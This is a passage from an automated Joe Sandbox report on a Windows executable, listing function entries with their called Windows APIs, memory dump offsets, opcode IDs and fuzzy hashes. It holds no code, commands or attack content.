                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3519838083-0
                                                                                                                        • Opcode ID: bfcd13a20f24b33c75e52ae2cdab51913e7dac422494d65dcc68ca553047dbb0
                                                                                                                        • Instruction ID: dc6bc64c856e4bcf9c0dd7c90cc8f86e7ef364f3faddd492abe24fe05d671a22
                                                                                                                        • Opcode Fuzzy Hash: bfcd13a20f24b33c75e52ae2cdab51913e7dac422494d65dcc68ca553047dbb0
                                                                                                                        • Instruction Fuzzy Hash: BCC1C270A002569FEF19CF78C484BA97BE6EF05314F0821F9EC46AB392DB319945CB61
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3519838083-0
                                                                                                                        • Opcode ID: 771d7dfcdf2288aacff1884dc335f54f0673370d39d463dca4ef345406b79657
                                                                                                                        • Instruction ID: d1d9d3ba6001e4b19de1b87afd9c27cd87b3b4b8e1b752232288f9405254d41e
                                                                                                                        • Opcode Fuzzy Hash: 771d7dfcdf2288aacff1884dc335f54f0673370d39d463dca4ef345406b79657
                                                                                                                        • Instruction Fuzzy Hash: 9671C071100B849EDF35DB70C8559EBF7E9AF15301F40196EE2ABA7241DA327A84CF21
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00E98289
                                                                                                                          • Part of subcall function 00E913DC: __EH_prolog.LIBCMT ref: 00E913E1
                                                                                                                          • Part of subcall function 00E9A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00E9A598
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog$CloseFind
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2506663941-0
                                                                                                                        • Opcode ID: 014979825d24812e993b6b57cc6e1faac508fcc33820f25edd68a4101bfe3338
                                                                                                                        • Instruction ID: f0ae4eb567dca22f75e3105dfde6ff09519dc492f5319a1ed1d6a36fb50de308
                                                                                                                        • Opcode Fuzzy Hash: 014979825d24812e993b6b57cc6e1faac508fcc33820f25edd68a4101bfe3338
                                                                                                                        • Instruction Fuzzy Hash: 1641D6719446589ADF20EB60CD55AEAB3B8AF15304F0414FBE09AB70A3EB716FC4CB10
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00E913E1
                                                                                                                          • Part of subcall function 00E95E37: __EH_prolog.LIBCMT ref: 00E95E3C
                                                                                                                          • Part of subcall function 00E9CE40: __EH_prolog.LIBCMT ref: 00E9CE45
                                                                                                                          • Part of subcall function 00E9B505: __EH_prolog.LIBCMT ref: 00E9B50A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3519838083-0
                                                                                                                        • Opcode ID: a52008003fd99c8fb5f9beb36ee349f6fda2a49310fdf530494b649358620f5a
                                                                                                                        • Instruction ID: 7fbdcc5903ed7457b7caef3203ca165cd248a5613beccb28f4da7260e8b77455
                                                                                                                        • Opcode Fuzzy Hash: a52008003fd99c8fb5f9beb36ee349f6fda2a49310fdf530494b649358620f5a
                                                                                                                        • Instruction Fuzzy Hash: EF4179B0905B419EE724DF798885AE6FBE5BF19300F50492ED5FE97282CB312654CB10
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00E913E1
                                                                                                                          • Part of subcall function 00E95E37: __EH_prolog.LIBCMT ref: 00E95E3C
                                                                                                                          • Part of subcall function 00E9CE40: __EH_prolog.LIBCMT ref: 00E9CE45
                                                                                                                          • Part of subcall function 00E9B505: __EH_prolog.LIBCMT ref: 00E9B50A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3519838083-0
                                                                                                                        • Opcode ID: 86d0f52a216a6e0b630ec3f8e1f93efe5d5c427222944c233c3fff7fc6271b8f
                                                                                                                        • Instruction ID: 9add98d227652fadd8328e7df38feec37ca5a57383ca323ee349d8a442543e29
                                                                                                                        • Opcode Fuzzy Hash: 86d0f52a216a6e0b630ec3f8e1f93efe5d5c427222944c233c3fff7fc6271b8f
                                                                                                                        • Instruction Fuzzy Hash: 834167B0905B409EEB24DF798885AE7FBE5BF19300F50592ED5FE97282CB322654CB10
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00EAB098
                                                                                                                          • Part of subcall function 00E913DC: __EH_prolog.LIBCMT ref: 00E913E1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3519838083-0
                                                                                                                        • Opcode ID: a54e130f0548b444c5045fec60763b02bd3c16b5772b4dbe57243c874dd3a9db
                                                                                                                        • Instruction ID: ccb734531e383acc8771498e75cec2dbf262b516cce01ef2340ecac18edf0d3d
                                                                                                                        • Opcode Fuzzy Hash: a54e130f0548b444c5045fec60763b02bd3c16b5772b4dbe57243c874dd3a9db
                                                                                                                        • Instruction Fuzzy Hash: 94318D75C01249EECF15DF68C9519EEBBF4AF1A304F10549EE409BB242D735AE04CB61
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00EBACF8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 190572456-0
                                                                                                                        • Opcode ID: 4b02a6565f057b04843cad23f1af0eb65ba63ac509fd4c66602aa627f3aea285
                                                                                                                        • Instruction ID: 7727447acc7310ae10e4e4ab9b16818d4f5ddc84aa42f7c7c3d3431b4845d3f6
                                                                                                                        • Opcode Fuzzy Hash: 4b02a6565f057b04843cad23f1af0eb65ba63ac509fd4c66602aa627f3aea285
                                                                                                                        • Instruction Fuzzy Hash: 61110633A002256F9F229E29EC409DBB796AB8472871E5231FD55FB254D731EC068BD2
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00E9CE45
                                                                                                                          • Part of subcall function 00E95E37: __EH_prolog.LIBCMT ref: 00E95E3C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3519838083-0
                                                                                                                        • Opcode ID: de5752f1c447f98e33fa0cd9fc4947110e9925af26c8a81be8513a9a33315e3a
                                                                                                                        • Instruction ID: fd3dd3ae3aa5307705f0c25f910cb7ff7996c876c892fe93db7d3abd47ccd4ac
                                                                                                                        • Opcode Fuzzy Hash: de5752f1c447f98e33fa0cd9fc4947110e9925af26c8a81be8513a9a33315e3a
                                                                                                                        • Instruction Fuzzy Hash: 78119E71A002449AEF24EB798509BAEBBE89F85304F24146EA446B7682DB745A00CB62
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3519838083-0
                                                                                                                        • Opcode ID: b9ca255bdd886fa79691b2b37a76ce03d7b34b81b433dbe4cc065d6d9ec14159
                                                                                                                        • Instruction ID: 39cb7af40c7ec8d048b544a2ee85bb21ccccec3c8712eabc538cef933d704cc1
                                                                                                                        • Opcode Fuzzy Hash: b9ca255bdd886fa79691b2b37a76ce03d7b34b81b433dbe4cc065d6d9ec14159
                                                                                                                        • Instruction Fuzzy Hash: 3301C833900539ABCF11ABACCD819DEB771BF88740F015129F812B7262DA34CD04C6A0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00EBB136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00EB9813,00000001,00000364,?,00EB3F73,00000050,?,00ED1030,00000200), ref: 00EBB177
                                                                                                                        • _free.LIBCMT ref: 00EBC4E5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 614378929-0
                                                                                                                        APIs
                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00EB9813,00000001,00000364,?,00EB3F73,00000050,?,00ED1030,00000200), ref: 00EBB177
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279760036-0
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00EB3C3F
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 190572456-0
                                                                                                                        APIs
                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00EBCA2C,00000000,?,00EB6CBE,?,00000008,?,00EB91E0,?,?,?), ref: 00EB8E38
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279760036-0
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00E95AC2
                                                                                                                          • Part of subcall function 00E9B505: __EH_prolog.LIBCMT ref: 00E9B50A
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3519838083-0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E9A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00E9A592,000000FF,?,?), ref: 00E9A6C4
                                                                                                                          • Part of subcall function 00E9A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00E9A592,000000FF,?,?), ref: 00E9A6F2
                                                                                                                          • Part of subcall function 00E9A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00E9A592,000000FF,?,?), ref: 00E9A6FE
                                                                                                                        • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00E9A598
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$FileFirst$CloseErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1464966427-0
                                                                                                                        APIs
                                                                                                                        • SetThreadExecutionState.KERNEL32(00000001), ref: 00EA0E3D
                                                                                                                        Similarity
                                                                                                                        • API ID: ExecutionStateThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2211380416-0
                                                                                                                        APIs
                                                                                                                        • GdipAlloc.GDIPLUS(00000010), ref: 00EAA62C
                                                                                                                          • Part of subcall function 00EAA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00EAA3DA
                                                                                                                        Similarity
                                                                                                                        • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1915507550-0
                                                                                                                        APIs
                                                                                                                        • DloadProtectSection.DELAYIMP ref: 00EAE5E3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DloadProtectSection
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2203082970-0
                                                                                                                        • Opcode ID: cbc092cab30bcfb3d600e00ed8db10503b23a755e47f6f2b9c6b91682ec3cd6d
                                                                                                                        • Instruction ID: 09539d56ff6235ca44601df18153e0e126039af5fca5228df9b1ec9e3bb21ea6
                                                                                                                        • Opcode Fuzzy Hash: cbc092cab30bcfb3d600e00ed8db10503b23a755e47f6f2b9c6b91682ec3cd6d
                                                                                                                        • Instruction Fuzzy Hash: C6D0A9B0684244CEC20DEBAAA842B243290B36EB08F8020C1F245B9290DA646084CB01
                                                                                                                        APIs
                                                                                                                        • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00EA1B3E), ref: 00EADD92
                                                                                                                          • Part of subcall function 00EAB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00EAB579
                                                                                                                          • Part of subcall function 00EAB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EAB58A
                                                                                                                          • Part of subcall function 00EAB568: IsDialogMessageW.USER32(0001043A,?), ref: 00EAB59E
                                                                                                                          • Part of subcall function 00EAB568: TranslateMessage.USER32(?), ref: 00EAB5AC
                                                                                                                          • Part of subcall function 00EAB568: DispatchMessageW.USER32(?), ref: 00EAB5B6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 897784432-0
                                                                                                                        • Opcode ID: 990174b69c5afc9692487f9c7191ac172d6b59f84608b339b30a97474ce85231
                                                                                                                        • Instruction ID: 4ffc045134658faad619db4f04bc8fdae7184cbd53ec201dddb43755de724d03
                                                                                                                        • Opcode Fuzzy Hash: 990174b69c5afc9692487f9c7191ac172d6b59f84608b339b30a97474ce85231
                                                                                                                        • Instruction Fuzzy Hash: 23D09E31144300BED6012B52DE06F1A7AE6EB8DB04F404595B284740B28672AD21DB11
                                                                                                                        APIs
                                                                                                                        • GetFileType.KERNELBASE(000000FF,00E997BE), ref: 00E998C8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileType
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3081899298-0
                                                                                                                        • Opcode ID: 0e6d6b20f3bea13e874746a05ffda22e3aeb8ed4eade3e6a36c3174f7b9590f6
                                                                                                                        • Instruction ID: a1934fce740d3f8c0fec1633483b59a3db698dd7dc99bf3bbac1d92b88c33831
                                                                                                                        • Opcode Fuzzy Hash: 0e6d6b20f3bea13e874746a05ffda22e3aeb8ed4eade3e6a36c3174f7b9590f6
                                                                                                                        • Instruction Fuzzy Hash: 8FC01234400205858F34563898450957311AB533697B4A69CC028950A2D323CC47EB00
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE3FC
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-0
                                                                                                                        • Opcode ID: ae73b2e30f5ccfa11693e6ed44abe8a809e7e2e578f93fb59f0307e3db2ad5cd
                                                                                                                        • Instruction ID: e56721bbdfac1de0ef025280befd56ac8aebda2db5099644249180bc3ba64b61
                                                                                                                        • Opcode Fuzzy Hash: ae73b2e30f5ccfa11693e6ed44abe8a809e7e2e578f93fb59f0307e3db2ad5cd
                                                                                                                        • Instruction Fuzzy Hash: 43B092A2258100BC2148A1141A02D360288C1CAB10330F12EF918F9280D84068090532
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE3FC
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-0
                                                                                                                        • Opcode ID: 4b4c50759ce842a3387f83774fe41dc9fedc223970ceafb2d3e1c108041304ba
                                                                                                                        • Instruction ID: e19d8a765b4fa6bde4c9808251475ae82e913e9856734b57218c778b8191c2e9
                                                                                                                        • Opcode Fuzzy Hash: 4b4c50759ce842a3387f83774fe41dc9fedc223970ceafb2d3e1c108041304ba
                                                                                                                        • Instruction Fuzzy Hash: 50B092A1258100BC2108A1145A02D360288C1CAF10330F02FF818F9280D8446E050532
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE3FC
